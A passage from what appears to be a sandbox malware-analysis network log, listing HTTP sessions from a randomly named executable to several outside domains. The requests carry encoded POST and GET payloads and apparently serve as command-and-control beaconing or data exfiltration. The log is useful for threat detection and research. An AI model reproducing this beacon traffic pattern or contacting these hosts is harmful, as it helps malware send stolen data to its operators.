                                                                                                                                                  Data Raw: 57 36 33 38 62 34 55 3d 4c 72 78 4c 62 6d 32 50 64 4b 4c 69 69 77 75 79 6f 6f 72 49 66 2b 77 64 6f 54 78 31 43 30 61 4a 35 4b 66 76 68 4d 38 4b 39 51 34 66 35 52 46 4a 36 49 55 6e 46 58 39 44 68 4a 78 35 61 41 52 4d 55 4b 50 37 72 73 79 34 6c 50 42 6e 68 58 6b 6d 37 78 61 65 48 6d 61 4b 65 4b 66 64 43 44 64 36 4c 4c 74 2f 76 55 6e 71 4f 43 45 30 42 2f 32 35 7a 34 67 32 46 7a 55 43 61 58 45 75 2f 4a 46 52 79 48 42 4d 6a 43 36 66 7a 58 65 71 66 77 53 42 6d 66 6a 51 30 53 39 4d 59 4f 6a 6a 6c 5a 75 66 6c 66 44 6f 74 6d 41 30 6d 43 4c 42 6d 51 47 55 2f 2f 61 6c 75 54 36 76 55 49 69 59 4e 43 6f 61 4c 4a 39 31 56 63 71 36 63 6d 65 64 44 45 35 68 79 49 6b 45 70 78 73 37 38 77 65 71 7a 4e 49 6d 5a 76 36 6a 6e 61 42 41 48 6c 6e 6a 45 4a 72 44 33 38 79 31 42 39 53 45 52 4e 6b 56 56 75 78 44 68 49 76 33 2f 73 76 49 4b 78 4a 4e 58 6f 6d 37 38 53 55 67 36 72 34 50 51 72 6f 53 53 4e 52 6a 49 52 44 69 4c 78 6b 53 6c 39 76 7a 47 2f 48 46 4f 4a 78 51 79 6b 5a 2b 31 6d 45 63 5a 71 54 31 6d 65 65 79 79 76 30 74 49 50 [TRUNCATED]
                                                                                                                                                  Data Ascii: W638b4U=LrxLbm2PdKLiiwuyoorIf+wdoTx1C0aJ5KfvhM8K9Q4f5RFJ6IUnFX9DhJx5aARMUKP7rsy4lPBnhXkm7xaeHmaKeKfdCDd6LLt/vUnqOCE0B/25z4g2FzUCaXEu/JFRyHBMjC6fzXeqfwSBmfjQ0S9MYOjjlZuflfDotmA0mCLBmQGU//aluT6vUIiYNCoaLJ91Vcq6cmedDE5hyIkEpxs78weqzNImZv6jnaBAHlnjEJrD38y1B9SERNkVVuxDhIv3/svIKxJNXom78SUg6r4PQroSSNRjIRDiLxkSl9vzG/HFOJxQykZ+1mEcZqT1meeyyv0tIPFD3jYed3NbTV40lieSArcdZNIpc+hMvzEuPTXGbc44Kq7WgWt23emEfPi8vq9NTOL1gm9zCQYxiPcVgEYvUerK4CWjXCpsbwBukBaNmgMZQ6E1QSFSIN3J6Q8XiEAs7DgbwshqP2g0L/jwwz6Ae9MdhjtHjEXkEB0pIbHqcsCSFWud+PhdUvFMzcJY2/27iMuImW6n7yHkg0rkLNqU4tUtrjMyyLcZBQtHg8f6vkcGI6wYX9h48FAE5sWbFJusezwqtkfrUxkbYSe1iN1jn+V5Q4XEpwvvrYHs58GVCYs59IDxAbOJR3nARtUMxyuaxvUopaeqf1XqX6PzPxusyK6k8HtogV7T8f2J93DLhU52k37ln7gXna9w6ExsnKDVVZ/KVul4bEA7I9jS8eB9HMRHrHrCDweJur0h89rRh0liZCVTjTLfA43fFyi6ETZOg4bmlCb4PB5GS1CkGune7TJfoACNQxbbV+WPVY+0BsmU5dgTL2tkMancgf7Xr7RaTnfN4Duqn5SNsGUyG5C/S7YvuvddPMVJGrJlgovRh+HaYYVqV018n5pALiPqMP5pWUmnsvdeSJrewyV+8kYuYMqUm5A4N84GM8A9OY/q5fEh+5n1Gk6/lXC81myx8Md5fY8JXYay1jWAiLjkjFqUJD7Xv3Tgl07OZvA7 [TRUNCATED]


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  48192.168.2.550027208.91.197.27804068C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 14, 2024 15:42:47.909849882 CET384OUTGET /fjsq/?W638b4U=GpZrYQXTa/T8sVztsMzbTqF8lxxIC07IkIuZnLhPq18W1QYyx74IZS8PtaR6C0AcFpyS8tKbrMRis2tA9BeSbA/Vc9/aSgY+IqBazWG3FiJEJ5+81Lg8Vy8GcHYtnLYhkw==&Xll=50hLc0Hhy HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.yushaliu.online
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Nov 14, 2024 15:42:49.098988056 CET1236INHTTP/1.1 200 OK
                                                                                                                                                  Date: Thu, 14 Nov 2024 14:42:48 GMT
                                                                                                                                                  Server: Apache
                                                                                                                                                  Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                  Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                                                  Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                                                                  X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_FKMBTmJuyXbFqvLAoLvQfEpbtPKyfLbeNG2jRQY+1WT0/+dut6/b0uGlh75jiNayqO9DqRrX5z0SNG/jgUy2lw==
                                                                                                                                                  Content-Length: 2615
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Connection: close
                                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4b 58 37 34 69 78 70 7a 56 79 58 62 4a 70 72 63 4c 66 62 48 34 70 73 50 34 2b 4c 32 65 6e 74 71 72 69 30 6c 7a 68 36 70 6b 41 61 58 4c 50 49 63 63 6c 76 36 44 51 42 65 4a 4a 6a 47 46 57 72 42 49 46 36 51 4d 79 46 77 58 54 35 43 43 52 79 6a 53 32 70 65 6e 45 43 41 77 45 41 41 51 3d 3d 5f 46 4b 4d 42 54 6d 4a 75 79 58 62 46 71 76 4c 41 6f 4c 76 51 66 45 70 62 74 50 4b 79 66 4c 62 65 4e 47 32 6a 52 51 59 2b 31 57 54 30 2f 2b 64 75 74 36 2f 62 30 75 47 6c 68 37 35 6a 69 4e 61 79 71 4f 39 44 71 52 72 58 35 7a 30 53 4e 47 2f 6a 67 55 79 32 6c 77 3d 3d 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 61 62 70 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 [TRUNCATED]
                                                                                                                                                  Data Ascii: <!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_FKMBTmJuyXbFqvLAoLvQfEpbtPKyfLbeNG2jRQY+1WT0/+dut6/b0uGlh75jiNayqO9DqRrX5z0SNG/jgUy2lw=="><head><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.yushaliu.online/px.js?ch=1">
                                                                                                                                                  Nov 14, 2024 15:42:49.099042892 CET1236INData Raw: 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 79 75 73 68 61 6c 69 75 2e 6f 6e 6c 69 6e 65 2f 70 78 2e 6a 73 3f 63 68 3d 32
                                                                                                                                                  Data Ascii: </script><script type="text/javascript" src="http://www.yushaliu.online/px.js?ch=2"></script><script type="text/javascript">function handleABPDetect(){try{if(!abp) return;var imglog = document.createElement("img");imglog.style.height="0px";img
                                                                                                                                                  Nov 14, 2024 15:42:49.099055052 CET987INData Raw: 3c 21 2d 2d 20 46 6f 6c 6c 6f 77 69 6e 67 20 4d 65 74 61 2d 54 61 67 20 66 69 78 65 73 20 73 63 61 6c 69 6e 67 2d 69 73 73 75 65 73 20 6f 6e 20 6d 6f 62 69 6c 65 20 64 65 76 69 63 65 73 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74
                                                                                                                                                  Data Ascii: ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"></head><body><div id="partner"></div><script type="t


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                  49192.168.2.5500283.33.130.19080
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 14, 2024 15:42:54.225327969 CET660OUTPOST /ucmb/ HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Content-Length: 208
                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.marketprediction.app
                                                                                                                                                  Origin: http://www.marketprediction.app
                                                                                                                                                  Referer: http://www.marketprediction.app/ucmb/
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Data Raw: 57 36 33 38 62 34 55 3d 69 6e 36 79 75 2f 59 46 2b 39 44 54 2f 74 50 34 77 36 76 6b 72 57 47 54 57 45 51 50 39 50 7a 33 4c 42 75 7a 46 41 6a 4b 73 66 64 75 7a 4a 6e 50 4f 4f 31 72 62 75 58 32 34 39 31 72 65 61 47 77 6d 43 78 6a 72 4c 74 69 61 50 65 61 77 48 50 45 4d 50 76 79 31 54 69 2b 5a 76 36 54 76 35 6d 72 6c 34 4e 45 70 53 68 74 46 58 62 38 6d 30 6d 50 37 74 57 31 4b 46 5a 36 39 63 62 44 33 6d 52 4a 67 66 39 45 77 59 61 52 73 34 4e 58 7a 51 34 32 48 36 6b 39 5a 6d 4d 67 33 4f 35 41 2b 39 2b 38 53 63 48 74 5a 47 54 49 38 51 7a 49 74 4e 4e 56 70 58 47 34 38 4b 61 5a 65 31 4b 65 49 50 6c 57 48 69 77 35 31 69 63 3d
                                                                                                                                                  Data Ascii: W638b4U=in6yu/YF+9DT/tP4w6vkrWGTWEQP9Pz3LBuzFAjKsfduzJnPOO1rbuX2491reaGwmCxjrLtiaPeawHPEMPvy1Ti+Zv6Tv5mrl4NEpShtFXb8m0mP7tW1KFZ69cbD3mRJgf9EwYaRs4NXzQ42H6k9ZmMg3O5A+9+8ScHtZGTI8QzItNNVpXG48KaZe1KeIPlWHiw51ic=


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                  50192.168.2.5500293.33.130.19080
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 14, 2024 15:42:56.786191940 CET680OUTPOST /ucmb/ HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Content-Length: 228
                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.marketprediction.app
                                                                                                                                                  Origin: http://www.marketprediction.app
                                                                                                                                                  Referer: http://www.marketprediction.app/ucmb/
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Data Raw: 57 36 33 38 62 34 55 3d 69 6e 36 79 75 2f 59 46 2b 39 44 54 35 4e 2f 34 6a 4e 54 6b 73 32 47 51 54 45 51 50 7a 76 7a 73 4c 42 71 7a 46 42 6e 61 73 73 31 75 32 63 44 50 50 50 31 72 65 75 58 32 7a 64 31 69 55 36 47 75 6d 43 39 42 72 4b 52 69 61 4f 36 61 77 47 2f 45 4d 2b 76 78 7a 44 69 47 52 50 36 52 78 4a 6d 72 6c 34 4e 45 70 53 6b 36 46 58 44 38 6d 45 57 50 36 4d 57 30 4d 31 5a 39 72 4d 62 44 6d 32 52 4e 67 66 39 79 77 64 37 4d 73 36 46 58 7a 53 77 32 48 72 6b 2b 51 6d 4d 6d 34 75 34 63 78 4f 37 33 65 74 4c 63 55 31 79 4a 68 7a 66 32 68 62 38 2f 7a 31 4f 51 76 71 32 68 4f 6d 43 70 5a 2f 45 2f 64 42 67 4a 72 31 49 65 79 74 36 59 6d 6e 39 2b 46 78 76 46 39 68 71 70 30 71 41 36
                                                                                                                                                  Data Ascii: W638b4U=in6yu/YF+9DT5N/4jNTks2GQTEQPzvzsLBqzFBnass1u2cDPPP1reuX2zd1iU6GumC9BrKRiaO6awG/EM+vxzDiGRP6RxJmrl4NEpSk6FXD8mEWP6MW0M1Z9rMbDm2RNgf9ywd7Ms6FXzSw2Hrk+QmMm4u4cxO73etLcU1yJhzf2hb8/z1OQvq2hOmCpZ/E/dBgJr1Ieyt6Ymn9+FxvF9hqp0qA6


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                  51192.168.2.5500303.33.130.19080
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 14, 2024 15:42:59.335459948 CET1697OUTPOST /ucmb/ HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Content-Length: 1244
                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.marketprediction.app
                                                                                                                                                  Origin: http://www.marketprediction.app
                                                                                                                                                  Referer: http://www.marketprediction.app/ucmb/
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Data Raw: 57 36 33 38 62 34 55 3d 69 6e 36 79 75 2f 59 46 2b 39 44 54 35 4e 2f 34 6a 4e 54 6b 73 32 47 51 54 45 51 50 7a 76 7a 73 4c 42 71 7a 46 42 6e 61 73 71 74 75 32 4b 50 50 4f 73 64 72 64 75 58 32 2b 39 31 76 55 36 48 79 6d 42 4e 46 72 4b 63 66 61 4e 53 61 77 6b 33 45 64 37 50 78 39 44 69 47 64 76 36 63 76 35 6d 2b 6c 37 31 49 70 54 55 36 46 58 44 38 6d 47 4f 50 38 64 57 30 58 31 5a 36 39 63 62 31 33 6d 52 31 67 66 46 69 77 64 2f 63 74 4f 4a 58 79 79 67 32 46 5a 4d 2b 52 47 4d 6b 2f 75 34 55 78 4a 7a 34 65 74 57 6c 55 30 47 7a 68 77 2f 32 69 38 68 51 67 32 75 56 74 6f 2b 62 45 55 6a 4b 47 5a 34 4f 55 6e 38 6a 33 48 38 57 2b 4e 53 49 70 43 70 7a 41 68 69 55 6d 6c 61 6b 36 39 39 47 51 64 68 32 31 45 74 38 66 72 63 65 4d 2f 67 53 4f 6f 34 4d 56 7a 38 34 56 68 31 2b 48 72 30 4a 76 64 59 33 38 42 48 54 37 46 63 68 4c 56 4c 54 54 71 51 31 4d 66 63 50 5a 4e 75 4c 6b 65 61 79 64 4d 62 30 4e 35 59 38 51 37 56 35 32 75 61 41 79 42 31 5a 6e 55 32 67 67 62 6b 43 5a 39 32 4c 32 31 53 35 58 4a 71 58 63 69 4d 63 42 4f [TRUNCATED]
                                                                                                                                                  Data Ascii: W638b4U=in6yu/YF+9DT5N/4jNTks2GQTEQPzvzsLBqzFBnasqtu2KPPOsdrduX2+91vU6HymBNFrKcfaNSawk3Ed7Px9DiGdv6cv5m+l71IpTU6FXD8mGOP8dW0X1Z69cb13mR1gfFiwd/ctOJXyyg2FZM+RGMk/u4UxJz4etWlU0Gzhw/2i8hQg2uVto+bEUjKGZ4OUn8j3H8W+NSIpCpzAhiUmlak699GQdh21Et8frceM/gSOo4MVz84Vh1+Hr0JvdY38BHT7FchLVLTTqQ1MfcPZNuLkeaydMb0N5Y8Q7V52uaAyB1ZnU2ggbkCZ92L21S5XJqXciMcBONRFZ6hzdD9XsWVFrRBRWMJYvMOwqWIL7vHJumQiCY3kj+IUFk7uABxeheKrxJ/X1e2oEZPMa3oZ9rNW9Uxlq9lNmev20UFHeAJealWkSp9TkA3CyUsB1zg8zC1gah+w7fQbng6e+DJvmCEZ7sOt6OM8uzQnCCPlUbC6t53Ls3txZhod+MXLEcsn4A/eLQbirlyXDBNbmav4r1Ub6LoanCfdnEvFpEkncr0jktJQCH8oGLqrjTnk+nV8waHOTQn3jrnDFGFtsc81Px8R+3ohIssOlCDqkdFhJ2RczbknCif47TTwM2zjGC27Gv4g9dL1EW+TAG++tEwsv40xGwxB289rmMhajqRXTdbsLrQtl8byOWFDwXkUkuZR10wuKOo5TH5L7FjGljDTvuyMiHz02NJjseVtm01Ws7VKf2mGKM+iWm8VOtfTkSNxFqw4GYgx+IOOFqUO6XJB8idJMNo1ZwnpPAJ0vdNsgaUCBYsucOrw0jDAc842U2/9Cs2N7tTMJAfAbK9XfA4nnbchxMOZvCPFUvfZmWqWjUDgnvBSZ4v8k1Vov0yrj+PjehOVrfx0kV/dIYz1tPKKDF4xnNiI7tfVzYJJXK/l+3H0BTC208Io1o/sdfH6Q9jEn3DeYljRhREDAn5w1uh/T0M1AvjTxPPcldF0uD6aPQX [TRUNCATED]


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                  52192.168.2.5500313.33.130.19080
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 14, 2024 15:43:01.889480114 CET389OUTGET /ucmb/?W638b4U=vlSStPgYi/rw0++s6ZKUsH+lT2dpjOyqKmbfTh2Wh6BCmYHhC9h1DMbb37dpPZ/1mBJsvII6DMGZ/nD5LfnLwkKxStK4w4vex/YLsSNnFHqgqyWr0vfKWW8f0ZD4+1Q9hQ==&Xll=50hLc0Hhy HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.marketprediction.app
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Nov 14, 2024 15:43:02.529592037 CET409INHTTP/1.1 200 OK
                                                                                                                                                  Server: openresty
                                                                                                                                                  Date: Thu, 14 Nov 2024 14:43:02 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Content-Length: 269
                                                                                                                                                  Connection: close
                                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 57 36 33 38 62 34 55 3d 76 6c 53 53 74 50 67 59 69 2f 72 77 30 2b 2b 73 36 5a 4b 55 73 48 2b 6c 54 32 64 70 6a 4f 79 71 4b 6d 62 66 54 68 32 57 68 36 42 43 6d 59 48 68 43 39 68 31 44 4d 62 62 33 37 64 70 50 5a 2f 31 6d 42 4a 73 76 49 49 36 44 4d 47 5a 2f 6e 44 35 4c 66 6e 4c 77 6b 4b 78 53 74 4b 34 77 34 76 65 78 2f 59 4c 73 53 4e 6e 46 48 71 67 71 79 57 72 30 76 66 4b 57 57 38 66 30 5a 44 34 2b 31 51 39 68 51 3d 3d 26 58 6c 6c 3d 35 30 68 4c 63 30 48 68 79 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?W638b4U=vlSStPgYi/rw0++s6ZKUsH+lT2dpjOyqKmbfTh2Wh6BCmYHhC9h1DMbb37dpPZ/1mBJsvII6DMGZ/nD5LfnLwkKxStK4w4vex/YLsSNnFHqgqyWr0vfKWW8f0ZD4+1Q9hQ==&Xll=50hLc0Hhy"}</script></head></html>


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                  53192.168.2.5500323.33.130.19080
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 14, 2024 15:43:19.129043102 CET390OUTGET /yjfe/?W638b4U=ssLl/70GAhUcKdDgdVfXop7fxRMgpYiZ3vsJccOUHyCqzcpfrIrrd04a2OAN6WfHhwyB0RQ+DljnHu6RgupRatGgzGgePg7VlA49G10KSSL4yAbTFmYSs1RlWHEt8ktcvA==&Xll=50hLc0Hhy HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.corpseflowerwatch.org
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Nov 14, 2024 15:43:19.819178104 CET409INHTTP/1.1 200 OK
                                                                                                                                                  Server: openresty
                                                                                                                                                  Date: Thu, 14 Nov 2024 14:43:19 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Content-Length: 269
                                                                                                                                                  Connection: close
                                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 57 36 33 38 62 34 55 3d 73 73 4c 6c 2f 37 30 47 41 68 55 63 4b 64 44 67 64 56 66 58 6f 70 37 66 78 52 4d 67 70 59 69 5a 33 76 73 4a 63 63 4f 55 48 79 43 71 7a 63 70 66 72 49 72 72 64 30 34 61 32 4f 41 4e 36 57 66 48 68 77 79 42 30 52 51 2b 44 6c 6a 6e 48 75 36 52 67 75 70 52 61 74 47 67 7a 47 67 65 50 67 37 56 6c 41 34 39 47 31 30 4b 53 53 4c 34 79 41 62 54 46 6d 59 53 73 31 52 6c 57 48 45 74 38 6b 74 63 76 41 3d 3d 26 58 6c 6c 3d 35 30 68 4c 63 30 48 68 79 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?W638b4U=ssLl/70GAhUcKdDgdVfXop7fxRMgpYiZ3vsJccOUHyCqzcpfrIrrd04a2OAN6WfHhwyB0RQ+DljnHu6RgupRatGgzGgePg7VlA49G10KSSL4yAbTFmYSs1RlWHEt8ktcvA==&Xll=50hLc0Hhy"}</script></head></html>


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                  54192.168.2.550033217.70.184.5080
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 14, 2024 15:43:24.846137047 CET639OUTPOST /gnvu/ HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Content-Length: 208
                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.4nk.education
                                                                                                                                                  Origin: http://www.4nk.education
                                                                                                                                                  Referer: http://www.4nk.education/gnvu/
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Data Raw: 57 36 33 38 62 34 55 3d 71 7a 71 44 68 39 6e 49 74 74 51 32 62 75 37 53 42 4d 30 4a 54 37 32 62 56 78 47 36 39 37 31 46 2b 2f 4b 6d 62 59 2f 68 64 30 48 4b 37 73 53 6b 76 34 53 34 61 43 4c 48 30 5a 68 74 7a 6a 46 74 43 7a 4f 6c 72 57 68 71 42 73 76 41 53 31 46 4f 77 41 51 6f 73 57 37 61 37 49 47 35 6b 79 4a 53 39 48 55 74 6f 64 77 39 56 6a 50 51 68 2f 73 42 51 54 61 2b 37 50 2b 47 71 2f 76 39 45 75 77 68 63 47 64 4a 68 6b 49 63 4d 59 74 36 75 6e 30 79 37 57 58 45 6f 34 66 51 68 4f 44 56 54 51 73 75 54 32 71 6b 4e 34 62 4f 70 38 73 4c 42 4e 72 4a 77 6a 70 61 4d 6a 71 35 6d 62 39 4e 4b 71 71 4d 54 55 50 67 6f 4b 51 3d
                                                                                                                                                  Data Ascii: W638b4U=qzqDh9nIttQ2bu7SBM0JT72bVxG6971F+/KmbY/hd0HK7sSkv4S4aCLH0ZhtzjFtCzOlrWhqBsvAS1FOwAQosW7a7IG5kyJS9HUtodw9VjPQh/sBQTa+7P+Gq/v9EuwhcGdJhkIcMYt6un0y7WXEo4fQhODVTQsuT2qkN4bOp8sLBNrJwjpaMjq5mb9NKqqMTUPgoKQ=
                                                                                                                                                  Nov 14, 2024 15:43:25.663518906 CET608INHTTP/1.1 501 Unsupported method ('POST')
                                                                                                                                                  Server: nginx
                                                                                                                                                  Date: Thu, 14 Nov 2024 14:43:25 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: close
                                                                                                                                                  Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                                                                                                  Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                  55192.168.2.550034217.70.184.5080
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 14, 2024 15:43:27.393357038 CET659OUTPOST /gnvu/ HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
